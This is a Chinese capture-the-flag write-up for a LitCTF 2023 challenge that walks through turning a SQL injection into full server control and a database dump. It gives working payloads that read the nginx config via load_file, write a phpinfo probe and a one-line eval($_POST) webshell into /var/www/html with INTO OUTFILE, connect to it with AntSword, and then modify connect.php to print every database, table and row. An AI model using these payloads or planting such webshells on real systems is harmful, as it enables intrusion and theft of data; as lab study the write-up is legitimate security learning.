LOADING

get shell后获取数据库

网络安全

怎么get shell

1[LitCTF 2023]这是什么?SQL !注一下 ! 为例 sql注入一句话木马,远程控制os 具体一点的过程在Sql注入os远程控制.md

收集信息

寻找网站根目录

接下来读取nginx配置文件

# payload:
?id=-1)))))) union select load_file('/etc/nginx/nginx.conf'),2%23

回显:
daemon off; worker_processes auto; error_log /var/log/nginx/error.log warn; events { worker_connections 1024; } http { include /etc/nginx/mime.types; default_type application/octet-stream; sendfile on; keepalive_timeout 65; server { listen 80; server_name localhost; root /var/www/html; index index.php; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; location / { try_files $uri $uri/ /index.php?$args; } location ~ \.php$ { try_files $uri =404; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; } } }
整理一下
# 运行 Nginx 为前台进程
daemon off;

# 根据可用 CPU 核心数自动设置工作进程数量
worker_processes auto;

# 设置错误日志文件的路径和日志级别
error_log /var/log/nginx/error.log warn;

# 事件处理模块配置
events {
    # 每个工作进程可以同时打开的最大连接数
    worker_connections 1024;
}

# HTTP 服务器配置
http {
    # 包含 MIME 类型定义文件
    include /etc/nginx/mime.types;
    
    # 默认的 MIME 类型
    default_type application/octet-stream;
    
    # 启用 sendfile,提高文件传输性能
    sendfile on;
    
    # 设置保持连接的超时时间
    keepalive_timeout 65;
    
    # 虚拟主机配置
    server {
        # 监听端口 80
        listen 80;
        
        # 服务器名称
        server_name localhost;
        
        # 网站文件的根目录
        root /var/www/html;
        
        # 默认的索引文件
        index index.php;
        
        # 设置代理头信息
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        
        # 根目录的处理规则
        location / {
            try_files $uri$uri/ /index.php?$args;
        }
        
        # PHP 文件的处理规则
        location ~ \.php$ {
            try_files $uri =404;
            fastcgi_pass 127.0.0.1:9000;
            fastcgi_index index.php;
            include fastcgi_params;
            fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
        }
    }
}

找到网站根目录:/var/www/html

写入php探针

# payload:
?id=-1)))))) union select '<?php phpinfo();?>',2 into outfile '/var/www/html/info.php'%23

然后访问http://node5.anna.nssctf.cn:24209/info.php
可以看到phpinfo页面,有很多有用的信息,如果出题人不仔细可能flag就在这里

写入webshell

# payload:
?id=-1)))))) union select '<?php eval($_POST["attack"]);?>',2 into outfile '/var/www/html/attack.php'%23

我们在/var/www/html/创建了attack.php
蚁剑连接:http://node6.anna.nssctf.cn:28413/attack.php
密码attack
然后就可以为所欲为了

怎么获取数据库

蚁剑连接后可以看到connect.php,内容如下:

<?php
  $servername = "localhost";
  $username = "root";
  $password = "123456";
  $dbname = "ctf";

  $conn = new mysqli($servername, $username, $password, $dbname);

  if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
  }
?>

可以看到数据库的连接信息 1. servername = “localhost”; 2. username = “root”; 3. password = “123456”; 4. dbname = “ctf”; 修改connect.php中的数据库连接信息,即可获取数据库
修改后的代码如下:

<?php
  $servername = "localhost";
  $username = "root";
  $password = "123456";
  $dbname = "ctf";

  $conn = new mysqli($servername, $username, $password, $dbname);

  if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
  }
  // 执行查询
  $sql = "SHOW DATABASES";
  $result =$conn->query($sql);

// 获取所有数据库的列表
$sql = "SHOW DATABASES";$result = $conn->query($sql);

// 遍历所有数据库
while($database =$result->fetch_assoc()) {
    $dbName = array_values($database)[0];
    
    // 选择数据库
    if ($conn->select_db($dbName)) {
        echo "Contents of database: " . $dbName . "<br>";

        // 获取数据库中所有表的列表
        $tablesSql = "SHOW TABLES FROM " .$dbName;
        $tablesResult =$conn->query($tablesSql);

        // 遍历所有表
        while($table =$tablesResult->fetch_assoc()) {
            $tableName = array_values($table)[0];

            // 输出表名
            echo "Contents of table: " . $tableName . "<br>";

            // 获取并输出表中的所有数据
            $tableSql = "SELECT * FROM " .$tableName;
            $tableResult =$conn->query($tableSql);

            if ($tableResult) {
                // 输出列名
                echo "<table border='1'><tr>";
                while ($fieldinfo =$tableResult->fetch_field()) {
                    echo "<td>" . $fieldinfo->name . "</td>";
                }
                echo "</tr>";

                // 输出数据
                while($row =$tableResult->fetch_assoc()) {
                    echo "<tr>";
                    foreach ($row as$value) {
                        echo "<td>" . htmlspecialchars($value) . "</td>";
                    }
                    echo "</tr>";
                }
                echo "</table><br>";
            } else {
                echo "Error: " . $tableSql . "<br>" .$conn->error;
            }
        }
    } else {
        echo "Cannot select database: " . $dbName . "<br>";
    }
}

// 关闭连接
$conn->close();
?>

然后访问connect.php,就可以获取数据库中的所有表和数据,包括列名和数据。
Ctrl+F搜索ctf关键字,即可获得答案。